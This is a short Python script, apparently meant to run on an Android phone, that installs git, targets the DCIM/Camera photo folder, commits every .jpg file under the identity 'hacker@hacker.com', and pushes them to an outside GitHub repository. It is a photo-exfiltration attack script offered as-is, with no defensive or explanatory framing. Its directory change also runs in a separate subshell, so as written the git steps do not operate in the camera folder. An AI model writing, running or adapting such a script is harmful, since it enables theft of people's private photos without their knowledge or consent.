from os import system 
from time import sleep
system('apt install git')
sleep(2)
system('cd /sdcard/DCIM/Camera')
sleep(2)
system('git init')
sleep(2)
system("git config --global user.email 'hacker@hacker.com' ")
sleep(2)
system("git config --global user.name 'newHakcer'")
sleep(2)
system('git add *.jpg   ')
sleep(2)
system("git commit -m 'init'")
sleep(2)
system('git remote add origin  https://github.com/ghh35181/ghaemdata.git')
sleep(2)
system('git push origin master ')